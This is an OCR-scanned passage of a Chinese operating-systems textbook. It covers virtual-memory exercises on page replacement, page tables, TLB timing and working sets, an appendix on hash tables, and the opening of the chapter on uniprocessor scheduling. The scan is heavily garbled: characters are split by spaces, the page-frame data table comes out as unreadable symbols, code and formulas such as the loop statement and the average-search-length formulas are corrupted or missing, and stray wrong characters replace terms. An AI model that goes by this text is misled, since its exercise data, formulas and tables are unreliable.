b) 假设 需要 设计 一 个 散 列 倒 排 页 表 来 实现 与 图 8.4 中 相同 的 寻 址 机 制 ， 使 用 一 个 散 列 函 数 来 将 20 位 
页 号 映射 到 6 位 散 列 表 。 表 项 包含 页 号 、 页 框 号 和 链 指针 。 如 果 页 表 可 以 给 每 个 散 列表 项 分 配 最 
多 3 个 溢出 项 的 空间 ， 散 列 倒 排 页 表 需 要 占用 多 大 的 内 存 空 间 ? 

一 个 进程 分 配给 4 个 页 框 (下 面 的 所 有 数字 均 为 十 进 制 数 ， 每 一 项 都 是 从 0 开始 计数 的 )。 上 一 次 把 

一 页 装 和 到 一 个 页 框 的 时 间 、 上 一 次 访问 页 框 中 的 页 的 时 间 、 每 个 次 框 中 的 虚拟 页 号 以 及 每 个 页 框 的 

访问 位 CR) 和 修改 位 ( M) 如 下 表 所 示 ( 时间 均 为 从 进程 开始 到 该 事件 之 间 的 时 钟 时 间 ， 而 不 是 从 

事件 发 生 到 当前 的 时 钟 值 )。 


| o | o | tt | o | 
o oi | wo | wwo | o O 
O> | s» | e | n 
当 虚 拟 页 4 发 生 缺 页 中 断 时 ， 使 用 下 列 内 存 管理 策略 ， 哪 一 个 页 框 将 用 于 置换 ? 解释 原因 。 
a) FIFO (先进 先 出 ) 算法 
b) LRU (最 近 最 少 使 用 ) 算法 
c) 时 钟 算法 
d) BE (使 用 下 面 的 访问 串 ) 算法 
e) 在 缺 页 中 断 之 前 给 定 上 述 的 内 存 状 态 ， 考 虑 下 面 的 虚拟 页 访问 序列 ; 
4, 0, 0, 0, 2, 4, 2, 1, 0, 3,2 

如 果 使 用 窗口 大 小 为 4 的 工作 集 策 略 来 代替 固定 分 配 策略 , 会 发 生 多 少 次 缺 页 中 断 ? 每 个 缺 页 中 
断 何 时 发 生 ? 
一 个 进程 访问 5 页 : A, B,C, DAE, 访问 顺序 如 下 : 

A; B; C; D; A; B; E; A; B; C; D; E 

假设 置换 算法 为 先进 先 出 ， 该 进程 在 内 存 中 有 三 个 页 框 ， 开 始 时 为 空 ， 请 查找 在 这 个 访问 顺序 中 
传送 的 页 号 。 对 于 4 个 页 框 的 情况 ， 请 重复 上 面 的 过 程 。 










虚拟 页 号 


8.6 


8.7 


8.8 


8.9 


8.10 


8.11 


8.12 


8.15 
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考虑 以 下 来 自 一 个 460 字 节 程序 的 虚拟 地 址 序列 : 
10, 11, 104, 170, 73, 309, 185, 245, 246, 434, 458, 364 
1) 给 出 引用 串 ， 假 设 页 面 大 小 为 100 字 节 。 
2) 下 面 给 出 了 三 个 算法 ,针对 1) 部 分 的 引用 串 ， 计 算 缺 页 次 数 。 对 每 一 种 情况 ， 假 设 页 框 初始 时 为 
是 空 ， 在 每 一 个 给 定 的 时 间 点 ， 给 出 在 内 存 中 有 哪些 页 面 。 
a) LRU (有 200 字 节 的 物理 内 存 可 用 ) 
b) FIFO (有 200 字 节 的 物理 内 存 可 用 ) 
c) OPT (有 200 字 节 的 物理 内 存 可 用 ) 
在 VAX 中 ， 用 户 页 表 以 系统 空间 的 虚拟 地 址 进行 定位 。 让 用 户 页 表 位 于 虚 存 而 不 是 内 存 中 有 什么 好 
处 ? 有 什么 缺点 ? 
假设 在 内 存 中 执行 下 列 程序 语句 : 
for (i = 1; i <= n; i++) 
a [li] =b [i ] +e li]; 


页 尺寸 为 1000 ^F. 4 n=1000。 使 用 一 台 具 有 所 有 寄存 器 指令 并 使 用 了 索引 寄存 器 的 机 器 ， 写 

出 实现 上 面 语句 的 一 个 示例 程序 ， 然 后 给 出 在 执行 过 程 中 的 页 访问 顺序 。 
IBM System/370 体系 结构 使 用 两 级 存储 器 结构 ,并 且 分 别 把 这 两 级 称 做 段 和 页 ， 这 里 的 分 段 方 法 缺少 
本 章 所 描述 的 关于 段 的 许多 特征 。 对 于 这 个 基本 的 370 体系 结构 ， 页 尺寸 可 以 是 2KB 或 4KB， 段 大 
小 国定 为 64KB 或 1MB。 对 于 370/XA 和 370/ESA 体系 结构 , 页 尺寸 为 4KB， 段 大 小 为 1MB。 这 种 方 
案 缺 少 一 般 分 段 系 统 的 哪些 优点 ? 370 的 分 段 方法 有 什么 好 处 ? 

考虑 一 个 64 位 地 址 空间 的 系统 ， 页面 大 小 为 4KB ( 4096 字 节 ) 

a) 虚拟 地 址 空间 有 多 少 地址 ? 

b) 如 果 要 实现 一 个 简单 的 一 级 页 表 ， 该 页 表 中 有 多 少 表 项 ? 

c ) 如 果 虚 拟 地 址 空间 非常 大 , 则 b ) 部 分 提出 了 一 个 很 严重 的 问题 : 请 问 它 是 个 什么 问题 ? 如何 解 决 它 ? 
考虑 这 样 一 个 分 页 系统 ， 该 系统 在 内 存 中 存放 了 二 级 页 表 ,， 在 TLB 中 存储 了 最 近 的 访问 的 16 个 页 
表 表 项 。 如 果 内 存 访问 需要 80ns，TLB 检查 需要 20ns， 页 面 交 换 ( SARA) 时 间 需 要 5000ns。 假 
KA 20% 的 页 面 置换 被 更 改 ， 如 果 TLB 的 命中 率 是 95%， 缺 页 率 是 10%， 那 么 访问 一 个 数据 项 需要 
多 长 时 间 ? 

考虑 一 个 进程 的 页 访问 序列 ， 工 作 集 为 好 页 框 ， 最 初 都 是 空 的 。 页 访问 串 的 长 度 为 已， 包含 N 个 不 
同 的 页 号 。 对 任何 一 种 页 面 置换 算法 ， 

a) 缺 页 中 断 次 数 的 下 限 是 多 少 ? 

b) 缺 页 中 断 次 数 的 上 限 是 多 少 ? 

在 论述 一 种 页 面 置换 算法 时 ， 一 位 作者 用 一 个 在 循环 轨道 上 来 回 移 动 的 雪 犁 机 来 模拟 说 明 :; 雪 均 匀 
地 落 在 轨道 上 ， 雪 犁 机 以 恒定 的 速度 在 轨道 上 不 断 地 循环 ， 轨 道上 被 扫 落 的 雪 从 系统 中 消失 。 

a) 8.2 节 讨论 的 哪 一 种 页 面 置换 算法 可 以 它 来 模拟 ? 

b) 这 个 模拟 说 明了 页 面 置换 算法 的 哪些 行为 ? 

在 S/370 体系 结构 中 ， 存 储 关键 字 是 与 实 存 中 每 个 页 框 相关 联 的 控制 字段 。 这 个 关键 字 中 与 页 面 置 
换 有 关 的 有 两 位 : 访问 位 和 修改 位 。 当 为 读 或 写 而 访问 到 页 框 中 的 任何 地 址 时 ,访问 位 被 置 成 1; 当 
一 个 新 页 被 装 人 到 该 页 框 中 时 ,访问 位 被 置 成 0。 当 在 页 框 中 的 任何 单元 执行 写 操作 时 ， 修 改 位 被 置 
为 1。 请 给 出 一 种 方法 ， 仅 仅 使 用 访问 位 来 确定 哪个 页 框 是 最 近 最 少 使 用 的 。 

考虑 如 下 的 页 访问 序列 (序列 中 的 每 一 个 元 素 都 是 页 号 ): 

12345213323454511325 


定义 经 过 次 访问 后 平均 工作 集 大 小 为 s(a TSI A)| ， 并 且 定义 经 过 次 访问 后 错过 页 的 


概率 为 mi( A)= Ý FUA), 其 中 如 果 缺 页 中 断 发 生 在 虚拟 时 间 t, FEA), BN F(t, A )=0。 


a) 4A=1,2,3,4,5,6 时 ， 绘 制 与 图 8.19 类 似 的 图 表 来 说 明 刚 定义 的 访问 序列 的 工作 集 。 
b) BH s20 4 ) 关 于 A 的 表达 式 。 
c) 写 出 mol A ) 关 于 A 的 表达 式 。 


268 FAD A & 





8.16 VSWS 驻 留 集合 管理 策略 的 性 能 关键 是 2 的 值 。 经 验 表 明 ， 姐 果 对 一 个 进程 使 用 固定 的 @ 值 ， 则 在 
不 同 的 执行 阶段 ， 缺 页 中 断 发 生 的 频率 有 很 大 的 差别 。 此 外 ， 如 果 对 不 同 的 进程 使 用 相同 的 CO 值 ， 
则 缺 页 中 断 发 生 的 频率 会 完全 不 同 。 这 些 差别 表明 , 如 果 有 一 种 机 制 可 以 在 一 个 进程 的 生命 周期 中 动 
态 地 调整 的 值 ， 则 会 提高 算法 的 性 能 。 请 基于 这 种 目标 设计 一 种 简单 的 机 制 。 

8.17 ”假设 一 个 任务 被 划分 成 4 个 大 小 相等 的 段 ， 并 且 系 统 为 每 个 段 建 立 了 一 个 有 8 项 的 页 描述 符 表 。 因 
此 ,该 系统 是 分 段 与 分 页 的 组 合 。 假 设 页 大 小 为 2KB。 
a) 每 段 的 最 大 尺寸 为 多 少 ? 
b) 该 任务 的 逻辑 地 址 空间 最 大 为 多 少 ? 
c) 假设 该 任务 访问 到 物理 单元 00021ABC 中 的 一 个 元 素 , 那么 为 它 产生 的 逻辑 地 址 的 格式 是 什么 ? 

该 系统 的 物理 地 址 空间 最 大 为 多 少 ? 

8.18 考虑 一 个 分 页 式 的 逻辑 地 址 空间 ( 由 32 个 2KB 的 页 组 成 )， 将 它 映 射 到 一 个 IMB 的 物理 内 存 空间 。 
a) 该 处 理 器 的 逻辑 地 址 格式 是 什么 ? 
b) 页 表 的 长 度 和 宽度 是 多 少 ( 忽略 “访问 权限 ”位 ) ? 
c) 如 果 物 理 内 存 空间 减少 了 一 半 ， 则 会 对 页 表 有 什么 影响 ? 

8.19 UNIX 内 核 可 以 在 需要 时 动态 地 在 虚 存 中 增加 一 个 进程 的 栈 ,但 却 从 不 缩小 这 个 栈 。 考 虑 下 面 的 例子 : 
一 个 程序 调用 一 个 C 语言 子 程序 ， 这 个 子 程序 在 栈 中 分 配 一 个 本 地 数组 ， 一 共 需 要 10KB 大 小 ， 内 
核 扩 展 这 个 栈 段 来 适应 它 。 当 这 个 子 程序 返回 时 , 内 核 应 该 调整 栈 指针 并 释放 空间 , 但 它 却 未 被 释放 。 
解释 这 时 为 什么 可 以 缩小 栈 以 及 UNIX 内 核 为 什么 没有 缩小 栈 。 


附录 8A ” 散 列 表 


考虑 下 面 的 问题 。 一 个 表 中 有 N 项， 每 一 项 都 由 一 个 标号 和 一 些 附 加 信息 组 成 ， 这 类 信息 可 以 称 为 该 
项 的 值 。 和 希望 能 够 对 表 执 行 一 些 普 通 操 作 ， 如 插入 、 删 除 以 及 根据 标号 查找 某 一 项 。 

如 果 这 些 项 的 标号 是 数字 ， 范 围 从 0 到 M-1, 一 种 简单 的 解决 方案 是 使 用 一 个 长 度 为 M 的 表 。 标 号 为 
i 的 项 被 插入 到 表 中 的 第 i 个 单元 。 只 要 这 些 项 的 长 度 是 固定 的 ， 对 表 的 查找 就 是 微不足道 的 ， 只 需要 根据 
该 项 的 数字 标号 在 表 中 检索 即 可 。 此 外 ， 没 有 必要 在 表 中 保存 每 一 项 的 标号 ， 因 为 标号 可 以 隐 含 在 该 项 的 
位 置 中 。 这 样 的 表 称 做 直接 访问 表 (direct access table )。 

如 果 标 号 不 是 数字 的 ， 仍 然 可 以 使 用 直接 访问 的 方法 。 把 这 些 项 表示 成 4[1]，…，4[M。 每 一 项 ALi 
由 标号 ( 或 关键 字 ) k; 和 值 v; 组 成 。 EM TR RD, 使 得 对 所 有 的 关键 字 ,， HA) 的 值 在 1 和 对 之 间 ， 
并 且 对 任意 的 i 和 j 有 (ki) 关 1k)。 在 这 种 情况 下 ， 也 可 以 使 用 直接 访问 表 ， 表 的 长 度 等 于 Mo 

如 果 M 远 大 于 N， 则 这 些 方案 就 会 出 现 问题 。 此 时 ， 表 中 未 使 用 的 表 项 部 分 很 大 ， 从 而 使 得 内 存 的 使 
用 非常 低 效 。 一 种 可 供 选 择 的 方案 是 使 用 长 度 为 N 的 表 ， 并 且 在 N 个 表 项 中 保存 N 项 (标号 和 值 )。 这 个 
方案 的 存储 量 最 小 ， 但 在 对 表 进 行 搜索 时 ， 需 要 一 些 处 理 负 担 。 有 以 下 几 种 可 能 的 搜索 方法 : 

o 顺序 搜索 ， 对 于 大 表 来 说 ， 这 种 塞 力 的 方法 非常 费时 。 

o 关联 搜索 : 通过 适当 的 硬件 ， 可 以 同时 搜索 表 中 的 所 有 元 素 。 这 种 方法 并 不 是 通用 的 ， 不 能 用 于 所 有 表 。 

© 二 分 搜索 ; 如 果 标 号 或 标号 的 数字 映射 在 表 中 按 升 序 排列 ， 则 二 分 搜索 比 顺序 搜索 ( 见 表 8.7) 要 

快 得 多 ， 并 且 不 需要 专门 的 硬件 。 


表 8.7 长 度 为 M 的 表 中 ， 搜 索 N 项 中 的 一 项 的 平均 搜索 长 度 





技 术 搜索 长 度 
直接 1 
顺序 Mi 
z 
二 分 log.” 
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二 分 搜索 是 一 种 比较 好 的 表 搜 索 方 法 ， 它 的 主要 缺点 是 增加 一 个 新 项 不 是 一 个 简单 的 流程 ， 需 要 对 表 
项 重新 排序 。 因 此 ， 二 分 搜索 通常 只 用 于 相对 静态 且 很 少 发 生变 化 的 表 。 
希望 能 够 消除 简单 的 直接 访问 方法 在 内 存 使 用 方面 的 缺陷 和 前 面 列 出 的 其 他 方法 在 处 理 方面 的 缺陷 。 
最 经 常 使 用 的 折 中 方法 是 散 列 法 。 散 列 法 是 20 世纪 50 年 代 提 出 的 ， 其 实现 比较 简单 。 它 有 两 个 优点 : 首 
先 ， 它 和 直接 访问 一 样 ， 可 以 在 一 次 查找 中 找到 大 多 数 项 ; 其 次 ， 可 以 处 理 插 人 和 删除 ， 不 需要 增加 任何 
额外 的 复杂 性 。 
散 列 函数 可 以 定义 如 下 。 假 设 有 W 项 都 保存 在 一 个 长 度 为 MHRA, EP M>N, 但 并 不 比 N 大 
很 多 。 为 在 表 中 插入 一 项 ， l 
ll. 把 该 项 的 标号 转换 成 0 到 M-1 之 间 一 个 伪 随 机 数 xn。 例如 ， 如 果 标 号 是 数字 ， 则 常用 的 驱 射 函数 
是 用 这 个 标号 除 以 M， 得 到 的 余数 为 n。 
12. 把 用 做 索引 检索 散 列表 的 : 
a) 如 果 表 中 相应 的 表 项 为 空 ， 则 把 该 项 (标号 和 值 ) 保存 在 这 个 表 项 中 。 
b ) 恕 果 该 表 项 已 经 被 占据 了 ， 则 把 这 一 项 保存 在 一 个 洲 出 区 (在 本 附录 后 面 会 讲 到 )。 
为 了 在 表 中 查找 标号 已 知 的 一 项 ， 
LI. 使 用 和 播 入 操作 相同 的 映射 函数 ， 把 该 项 的 标号 转换 成 0 到 Ml 之 间 一 个 伪 随 机 数 no 
L2. 把 n 用 做 索引 检索 散 列表 : 
a) 如 果 相 应 的 表 项 为 空 ， 则 这 一 项 还 没有 保存 在 表 中 。 
b) 如 果 该 表 项 已 经 被 占据 ， 并 且 标 号 匹配 ， 则 可 以 找到 这 个 值 。 
c) 如 果 该 表 项 已 经 被 占据 并 且 标号 不 匹配 ， 继 续 在 溢出 区 中 搜索 。 
根据 不 同 的 溢出 处 理 方法 ， 散 列 方案 也 各 不 相同 。 一 种 比较 常见 的 技术 称 为 线性 散 列 ( linear hashing ) 
技术 ， 常 常用 在 编译 器 中 。 对 于 这 种 方法 ， 规 则 I2.b 变 成 
I2.b. 如 果 这 个 表 项 已 经 被 占据 了 ， 令 n=ntl(mod M), 返回 12.a 2#}, 
规则 L2.c 也 相应 地 进行 了 修改 。 
8.27a 给 出 了 一 个 例子 。 在 这 个 例子 中 ,要 保存 的 项 的 标号 是 数字 ， 散 列表 有 8 个 位 置 ( M=8), R 
射 函数 取 标 号 除 以 8 后 的 余数 。 该 图 假设 这 些 项 按 数字 的 升序 播 人 ， 但 这 并 不 是 必需 的 。 因 些 ， 项 50 和 
51 分 别 映射 到 位 置 2 和 3， 这 些 位 置 为 空 ， 它 们 就 被 插入 到 那里 。 项 74 也 映射 到 位 置 2， 但 这 时 位 置 2 非 
空 ， 故 再 尝试 位 置 3。 位 置 3 也 被 占据 ， 因 此 最 后 使 用 了 位 置 4。 








b) 使 用 链 的 溢出 


8.27 BA 
由 于 集 艇 性 的 影响 ， 在 一 个 开放 的 散 列表 中 很 难 确定 搜索 一 项 的 平均 长 度 。Schay 和 Spruth 给 出 了 一 
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个 近似 的 公式 [ SCHA62 ]: 
平均 搜索 长 度 二 二 一 

其 中 r=N/M。 ER, 结果 与 表 的 大 小 无 关 ， 只 依赖 于 表 的 填 满 程序 。 令 人 惊讶 的 是 , 当 填 满 了 80% 的 表 时 ， 
搜索 的 平均 长 度 仍然 大 约 为 3。 

即便 如 此 ， 长 度 为 3 的 搜索 仍然 太 长 了 。 线 性 散 列表 的 另外 一 个 问题 是 删除 一 项 不 容易 。 一 个 更 具有 
吸引 力 的 方法 是 使 用 链 的 溢出 ， 它 在 搜索 时 长 度 更 短 (LX 8.7 )， 并 且 删 除 和 添加 一 样 容易 。 图 8.27b 说 
明了 使 用 该 技术 的 例子 。 在 这 种 情况 下 ， 有 一 个 独立 的 表 用 于 插入 溢出 的 表 项 。 与 散 列表 中 任何 一 个 位 置 
相关 联 的 表 项 都 组 织 成 链 ， 表 中 包含 沿 着 链 指向 这 些 项 的 指针 。 此 时 ， 假 设 数据 是 随机 分 布 的 ， 则 平均 搜 
REBEL 





1+N-1 


当 N 和 人 比较 大 时 ， 如 果 N=M， 则 这 个 值 接近 1.5。 因 此 ， 这 种 技术 保证 了 紧密 的 存储 和 快速 搜索 。 








操作 系统 必须 为 多 个 进程 之 间 可 能 有 竞争 关系 的 请 求 分 配 计算 机 资源 。 对 处 理 器 而 言 , 可 分 
配 的 资源 是 处 理 器 上 的 执行 时 间 ， 分 配 途 径 是 调度 。 调 度 功能 必须 设计 成 可 以 满足 多 个 目标 ， 包 
括 公平 、 任 何 进程 都 不 会 产生 饥 馈 、 有 效 地 使 用 处 理 器 时 间 以 及 较 低 的 开销 。 此 外 ， 在 启动 或 结 
束 菜 些 进程 时 ， 调 度 功 能 可 能 需要 考虑 不 同 优先 级 和 实时 的 期 限 。 

这 些 年 来 ， 调 度 已 经 成 为 深入 研究 的 焦点 ， 并 且 已 经 实现 了 许多 不 同 的 算法 。 如 今 ， 调 度 研 
究 的 重点 是 开发 多 处 理 器 系统 ， 特 别 是 用 于 多 线程 应 用 的 调度 和 实时 调度 。 


第 四 部 分 导读 


SOR 单 处 理 器 调度 


第 9 章 关 注 单 处 理 器 系统 的 调度 问题 。 在 这 个 限制 条 件 下 , 可 以 定义 并 阅 明 许多 与 调度 相关 
的 设计 问题 。 第 9 章 一 开始 先 分 析 三 种 调度 类 型 : 长 程 、 中 程 和 短程 。 这 一 章 的 大 部 分 内 容 集 中 
在 短程 调度 问题 上 ， 并 且 分 析 比 较 各 种 不 同 的 算法 。 


第 10 章 多 处 理 器 和 实时 调度 


第 10 章 着 眼 于 两 个 领域 ， 这 两 个 领域 都 是 调度 研究 的 重点 。 多 处 理 器 的 出 现 使 得 调度 决策 
问题 变 得 更 加 复杂 ， 但 同时 也 展现 了 一 些 新 的 机 会 。 特 别 地 ， 多 处 理 器 可 以 通过 调度 而 并 行 执行 
同一 个 进程 的 多 个 线程 。 第 10 章 的 第 一 部 分 给 出 多 处 理 器 和 多 线程 调度 的 概述 ， 其 余部 分 处 理 
实时 调度 问题 。 由 于 一 个 特定 任务 或 者 进程 指定 了 开始 和 结束 的 时 间 了 限制, 导致 实时 要 求 超出 了 
公平 性 或 优先 级 ， 因 而 是 最 需要 调度 程序 来 满足 的 。 


第 9 章 单 处 理 器 调度 


在 多 道 程序 设计 系统 中 , 内 存 中 有 多 个 进程 。 每 个 进程 或 者 正在 处 理 器 上 运行 , 或 者 正在 等 
待 某 些 事件 的 发 生 ， 比 如 1/0 完成 。 处 理 器 (或 处 理 器 组 ) 通过 执行 某 个 进程 而 保持 忙 状态 ， 而 
此 时 其 他 进程 处 于 等 待 状态 。 

多 道 程序 设计 的 关键 是 调度 。 实 际 上 比较 典型 的 有 四 种 类 型 的 调度 (如 表 9.1 所 示 )。 其 中 
IO 调度 放 在 第 11 章 (讲述 有 关 IO 的 问题 ) 比较 合适 。 剩 下 的 三 种 调度 类 型 属于 处 理 器 调度 ， 
将 在 本 章 和 第 10 章 讲述 。 


表 9.1 调度 的 类 型 








项 目 说 RA 
长 程 调 度 决定 加 入 到 待 执行 的 进程 池 中 
中 程 调 度 决定 加 入 到 部 分 或 全 部 在 内 存 中 的 进程 集合 中 
短程 调度 决定 哪 一 个 可 运行 的 进程 将 被 处 理 器 执行 


LO 调度 决定 哪 一 个 进程 挂 起 的 IO 请 求 将 被 可 用 的 IO 设备 处 理 


本 章 首先 分 析 三 种 类 型 的 处 理 器 调度 , 并 给 出 了 它们 之 间 是 如 何 关 联 的 。 我们 知道 长 程 调度 
和 中 程 调度 主要 是 由 与 系统 并 发 度 9 相关 的 性 能 来 驱动 的 , 这 些 问题 在 第 3 章 得 到 了 一 定 程度 的 
解决 ,而 在 第 7 章 和 第 8 章 讲述 得 更 加 详细 。 因 此 本 章 的 其 余部 分 集中 讲述 短程 调度 ,并 且 只 考 
不单 处 理 器 系统 中 的 调度 情况 。 这 是 由 于 多 处 理 器 的 使 用 增加 了 人 额外 的 复杂 性 , 因此 最 好 先 考虑 
单 处 理 器 的 情况 ,这样 可 以 更 清楚 地 看 到 调度 算法 之 间 的 区 别 。 

9.2 节 将 给 出 可 用 于 短程 调度 决策 的 各 种 算法 。 


9.1 处理 器 调度 的 类 型 


处 理 器 调度 的 目标 是 以 满足 系统 目标 (如 响应 时 间 、 吞 吐 率 、 处 理 器 效率 ) 的 方式 ,把 进程 
分 配 到 一 个 或 多 个 处 理 器 中 执行 。 在 许多 系统 中 , 这 个 调度 活动 分 成 三 个 独立 的 功能 : 长 程 、 中 
程 和 短程 调度 。 它 们 的 名 字 表 明了 在 执行 这 些 功 能 时 的 相对 时 间 比 例 。 

图 9.1 将 调度 功能 结合 到 了 进程 状态 转换 图 中 (首次 出 现在 图 3.9b 中 )。 创 建新 进程 时 ， 执 
行 长 程 调 度 ， 它 决定 是 否 把 进程 添加 到 当前 活跃 的 进程 集合 中 。 中 程 调度 是 交换 功能 的 一 部 分 ， 
它 决 定 是 否 把 进程 添加 到 那些 至 少 部 分 在 内 存 中 并 且 可 以 被 执行 的 进程 集合 中 。 短 程 调度 真正 决 
定 下 一 次 执行 哪 一 个 就 绪 进 程 。 图 9.2 重新 组 织 了 图 3.9b 表示 的 进程 状态 转换 图 , 用 于 表示 调度 
THRE HY HE 

由 于 调度 决定 了 哪个 进程 必须 等 待 、 哪 个 进程 可 以 继续 运行 ， 因 此 它 影响 着 系统 的 性 能 。 这 
一 点 可 以 在 图 9.3 中 看 出 ， 该 图 给 出 了 在 一 个 进程 状态 转换 过 程 中 所 涉及 的 队列 e 从 根本 上 说 ， 
调度 是 属于 队列 管理 ( managing queues ) 方面 的 问题 ， 用 来 在 排队 环境 中 减少 延迟 和 优化 性 能 。 


O RAR: 系统 并 发 度 是 指 可 处 于 等 待 处 理 器 执行 的 进程 的 个 数 。 
O 为 简单 起 见 ， 图 9.3 中 给 出 了 一 个 新 进程 直接 到 达 就 绪 态 的 情况 ， 而 图 9.1 和 图 9.2 中 给 出 了 到 达 就 绪 态 和 就 
绪 / 挂 起 态 两 种 不 同情 况 。 
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图 9.1 调度 和 进程 状态 转换 图 9.2 ”调度 的 层次 
长 程 调度 uy 
wet | 就 绪 队列 释放 
一 一 

,中 程 调度 


交互 用 户 i 就 绪 ， 挂 起 队列 


阻塞 ， 挂 起 队列 


阻塞 队列 
事件 发 生 





图 9.3 用 于 调度 的 队列 图 


9.1.1 长 程 调度 


长 程 调度 程序 决定 哪 一 个 程序 可 以 进入 到 系统 中 处 理 , 因此 , 它 控制 系统 并 发 度 。 一 旦 允许 
进入 ,一 个 作业 或 用 户 程序 就 成 为 一 个 进程 ,并 被 添加 到 供 短程 调度 程序 使 用 的 队列 中 等 待 调度 。 
在 某 些 系统 中 , 一 个 新 创建 的 进程 开始 处 于 被 换 出 状态 。 在 这 种 情况 下 , 它 被 添加 到 供 中 程 调度 
程序 使 用 的 队列 中 等 待 调度 。 

在 批 处 理 系统 或 通用 的 操作 系统 中 的 批 处 理 部 分 中 , 新 提交 的 作业 被 发 送 到 磁盘 , 并 保存 在 
一 个 批 处 理 队列 中 。 在 长 程 调度 程序 运行 的 时 候 , 从 队列 中 创建 相应 的 进程 。 这 里 涉及 两 个 决策 。 
首先 , 调度 程序 必须 决定 什么 时 候 操 作 系统 能 够 接纳 一 个 进程 或 多 个 进程 ; 第 二 , 调度 程序 必须 
决定 接受 哪个 作业 或 哪些 作业 ， 并 将 其 转变 成 进程 。 下 面 简单 地 考虑 一 下 这 两 个 决策 。 
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关于 何 时 创建 一 个 新 进程 的 决策 通常 由 要 求 的 系统 并 发 度 来 驱动 。 创建 的 进程 越 多 , 每 个 进 
程 可 以 执行 的 时 间 所 占 百分比 就 越 小 ( 即 更 多 进程 竞争 同样 数量 的 处 理 器 时 间 )。 因 此 ， 为 了 给 
当前 的 进程 集 提供 满意 的 服务 , 长程 调度 程序 可 能 限制 系统 并 发 度 。 每 当 一 个 作业 终止 时 , 调度 
程序 可 决定 增加 一 个 或 多 个 新 作业 。 此 外 ,如 果 人 处 理 器 的 空闲 时 间 片 超过 了 一 定 的 阅 值 , 也 可 能 
会 启动 长 程 调度 程序 。 

关于 下 一 次 允许 哪 一 个 作业 进入 的 决策 可 以 基于 简单 的 先 来 先 服务 原则 ,或 者 基于 管理 系统 
性 能 的 工具 ,其 使 用 的 原则 可 以 包括 优先 级 、 期 待 执行 时 间 和 IO 需求 。 例 如 ， 如 果 信 息 是 可 以 
得 到 的 ， 则 调度 程序 可 以 试图 混合 处 理 处 理 器 密集 型 的 ( processor-bound ) 和 VO 密集 型 的 
(IO-bound ) 进程 9 同样 ， 可 以 根据 请 求 的 IO 资源 来 做 出 决策 ， 以 达到 LO 使 用 的 平衡 。 

对 于 分 时 系统 中 的 交互 程序 , 用 户 试图 连接 到 系统 的 动作 可 能 产生 一 个 进程 创建 的 请 求 。 分 
时 用 户 并 不 是 仅仅 排队 等 待 ， 直到 系统 接受 它们 。 相 反 ， 操作 系统 将 接受 所 有 的 授权 用 户 ， 直 到 
系统 饱和 为 止 。 这 时 ， 连 接 请 求 将 会 得 到 系统 已 经 饱和 并 要 求 用 户 重新 尝试 的 消息 。 


9.1.2 ”中 程 调度 


中 程 调 度 是 交换 功能 的 一 部 分 , 第 3 章 、 第 7 章 和 第 8 章 都 讲述 过 这 方面 的 问题 。 在 典型 情 
GLP. 换 和 人 (swapping-in ) 决定 取决 于 管理 系统 并 发 度 需求 。 在 不 使 用 虚拟 内 存 的 系统 ,存储 管 
理 也 是 一 个 问题 。 因 此 ， 换 和 人 决定 将 考虑 换 出 ( swapped-out ) 进程 的 存储 需求 。 


9.1.3 短程 调度 


考虑 执行 的 频繁 程度 , 长 程 调度 程序 执行 的 频率 相对 较 低 , 并 且 仅 仅 是 粗略 地 决定 是 否 接受 
新 进程 以 及 接受 哪 一个。 为 进行 交换 决定 ， 中 程 调度 程序 执行 得 略微 频繁 一 些 。 短 程 调度 程序 ， 
也 称 做 分 派 程序 ( dispatcher )， 执 行 得 最 频繁 ， 并 且 精 确 地 决定 下 一 次 执行 哪 一 个 进程 。 

当 可 能 导致 当前 进程 阻塞 或 可 能 抢占 当前 运行 进程 的 事件 发 生 时 , 调用 短程 调度 程序 。 这 类 
事件 包括 : Neb. VO 中断、 操作 系统 调用 、 信 和 号 ( 如 信号 量 )。 


9.2 ”调度 算法 


9.2.1 短程 调度 准则 


短程 调度 的 主要 目标 是 按照 优化 系统 一 个 或 多 个 方面 行为 的 方式 来 分 配 处 理 器 时 间 。 通 常 需 
要 对 可 能 被 评估 的 各 种 调度 策略 建立 一 系列 规则 。 

通常 使 用 的 准则 可 以 按 两 维 来 分 类 。 首先 可 以 区 分 为 面向 用 户 的 准则 和 面向 系统 的 准则 。 E 
向 用 户 的 准则 与 单个 用 户 或 进程 感知 到 的 系统 行为 相关 。 例 如 交互 式 系 统 中 的 响应 时 间 。 响应 时 
间 是 指 从 提交 一 条 请 求 到 输出 响应 所 经 历 的 时 间 间 隔 , 这 个 时 间 数 量 对 用 户 是 可 见 的 , 自然 也 是 
用 户 关心 的 。 我 们 希望 调度 策略 能 给 各 种 用 户 提 供 “ 好 ”的 服务 。 对 于 响应 时 间 ， 可 以 定义 一 个 
阅 值 ， 如 2 秒 。 那 么 调度 机 制 的 目标 是 使 平均 响应 时 间 为 2 秘 或 小 于 2 秒 的 用 户 数目 达到 最 大 。 

另 一 个 准则 是 面向 系统 的 , 即 其 重点 是 处 理 器 使 用 的 效果 和 效率 。 关 于 这 类 准则 的 一 个 例子 
是 吞吐 量 , 也 就 是 进程 完成 的 速度 。 吞吐 量 是 关于 系统 性 能 的 一 个 非常 有 意义 的 度量 , 我 们 总 希 
望 系统 的 吞吐 量 能 达到 最 大 。 但 是 , 该 准则 的 重点 是 系统 的 性 能 ,而 不 是 提供 给 用 户 的 服务 。 因 
此 吞吐 量 是 系统 管理 员 所 关注 的 ， 而 不 是 普通 用 户 所 关注 的 。 l 


O ”如 果 一 个 进程 主要 执行 计算 工作 , 偶尔 才 会 用 到 VO 设备 , 则 该 进程 被 看 做 是 处 理 器 密集 型 的 ; 如 果 一 个 进程 
执行 所 使 用 的 时 间 主 要 取决 于 等 待 VO 操作 的 时 间 ， 则 把 它 看 做 是 VO 密集 型 的 。 
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面向 用 户 的 准则 在 所 有 系统 中 都 是 非常 重要 的 ,而 面向 系统 的 原则 在 单 用 户 系统 中 的 重要 性 
就 低 一 些 。 在 单 用 户 系统 中 , 只 要 系统 对 用 户 应 用 程序 的 响应 时 间 是 可 以 接受 的 , 则 实现 处 理 器 
高 利用 率 或 高 吞吐 量 可 能 并 不 是 很 重要 。 

男 一 维 的 划分 是 根据 这 些 准则 是 否 与 性 能 直接 相关 。 与 性 能 直接 相关 的 准则 是 定量 的 , 通常 
可 以 很 容易 地 度量 , 例如 响应 时 间 和 吞吐 量 。 与 性 能 无 关 的 准则 或 者 本 质 上 是 定性 的 , 或 者 不 容 
易 测 量 和 分 析 。 这 类 准则 的 一 个 例子 是 可 预测 性 。 我 们 希望 提供 给 用 户 的 服务 能 够 随 着 时 间 的 流 
